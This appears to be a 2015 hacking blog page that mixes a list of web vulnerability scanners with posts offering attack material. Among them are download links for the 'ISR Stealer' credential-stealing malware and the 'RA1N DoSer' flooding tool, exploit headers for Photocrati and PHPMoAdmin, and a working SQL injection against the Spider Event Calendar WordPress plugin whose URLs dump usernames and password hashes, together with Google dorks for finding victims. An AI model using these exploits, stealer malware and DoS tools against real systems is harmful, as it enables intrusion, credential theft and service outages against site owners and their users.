Hacking Tools And Tutorials

Just Educational Purpose Only For Pentesters And Developers

  • challenge

    I was addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses. Kevin Mitnick

    Read More

  • Computer hacking

    Computer hacking really results in financial losses and hassles. The objectives of terrorist groups are more serious. That is not to say that cyber groups can't access a telephone switch in Manhattan on a day like 9/11, shut it down, and therefore cause more casualties.Kevin Mitnick

    Read More

  • The only Entertainment

    Hacking was the only entertainment that would occupy my mind - like a huge video game, but with real consequences. I could have evaded the FBI a lot longer if I had been able to control my passion for hacking.Kevin Mitnick

    Read More

Monday, March 23, 2015

0 comments
Unknown, , ,

Top 6 Web Vulnerability Scanner Tool


Web site security is very important because the website contain relevant information about a company and now a days website defacement is very common even a script kiddies and a new born hackers can do this. The most common vulnerability like SQL-Injection and cross site scripting lead towards the defacement.


So you want to secure your web application than find vulnerabilities on it before a hacker find it, try to use some relevant tools and find vulnerabilities and fix it. There are so many tools available for both Windows and Linux platform and commercial and open source tool. Below is the best web vulnerability scanner tool that we have discussed before.
OWASP Zed Attack Proxy- ZAP
OWASP or Open Web Application Security Project is a non profit organisation world wide that are focusing on improving the security of web application, for more about OWASP click here.The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It has an automatic scanning functionality and it has a set of tools that allow you to find vulnerability manually.
Web Application Attack and Audit Framework (W3AF)
W3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af is working for Become the best Open Source Web Application Exploitation Framework. It is available on Backtrack 5 too.
Skipfish Web Vulnerability Scanner Tool
Skipfish is an automatic web application security tool, that has been designed to find the vulnerabilities on a web application, find vulnerability on your website before than a hacker find and exploit it. It is also available on Backtrack 5.
Nikto-Vulnerability Scanner
Nikto is one of the best open source web vulnerability scanner tool that is available on the famous Linux distribution like Backtrack, Gnacktrack,Backbox and others. You can use it on other distribution and on windows too because it is only need perl script.
Netsparker Web Application Security Scanner
Netsparker is a commercial tool that has been designed to find the vulnerabilities on web application, the free version of netparker is also available so you can download it and can use for a quick penetration testing on a web application.
Websecurify- Website Security Testing Tool
Websecurify is a cross operating system tool that can be run on Windows, Linux and MAC. It is the best tool to find the common web vulnerabilities that can cause a great harm to the web application.

This is just a small list of the best tools you can use Wapiti, Grendel scan and other tools to perform the job, you have any other tool in mind than do share it with us via comment box.
 
source : www.ehacking.net

Wednesday, March 18, 2015

0 comments
Unknown, , , ,

ShellfireVPN [One of the best VPN]


[*] German IP Address

[*] For Windows

[*] Normal surfing

[*] Encrypted Internet

[*] Safe surfing hotspot

[*] Bypass firewalls

0 comments
CoderX,

Wordpress Plugin Reflex Gallery - Arbitrary File Upload

Via->intelliegentexploit

Thursday, March 5, 2015

0 comments
Unknown, , , ,

Best Stealer Ever (ISR Stealer 0.4.1)


 
Video Tutorial: youtube
credit to uploader :)

Download : Mediafire

0 comments
CoderX, ,

wordpress theme photocrati 4.X.X SQL INJECTION 



# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ] 
 
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes

attacker can do a remote injection in site URL to get some sensitive information .
=======================================================
 
0 comments
CoderX, ,

PHPMoAdmin Remote Code Execution 

######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################
 
[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.
0 comments
CoderX,

WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection] 

# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9  [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection
 
Google Dork-> /wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=
 
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=
1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME
(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name
%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,
%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
 
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=
2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR
(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR
(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup
%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
 

Tuesday, March 3, 2015

0 comments
Unknown, , ,

RA1N DoSer v4 (lite)



Flooding
  • UDP
  • TCP
  • SYN
Features
  • Port Scanning (100+ times faster than RDv3)
  • History
  • Favorites
  • Awesome CPanel
  • Defualts for input fields for flooding
  • and more!
Tech Specs:
  • Over 25kbs a UDP Flood
  • Cusstomizable SYN Flooding (using exploitations)
  • Encrypted source (noobs piss me off)
  • TCP Flooding (very efficient)
  • program averages only 5,000 kbs of processing

[x] Download ->  http://dl.dropbox.com
[x] Download ->  http://mediafire.com
 
[x] Virusscan ->
Code: https://www.virustotal.com/

credit : RA1N
Subscribe to: Posts (Atom)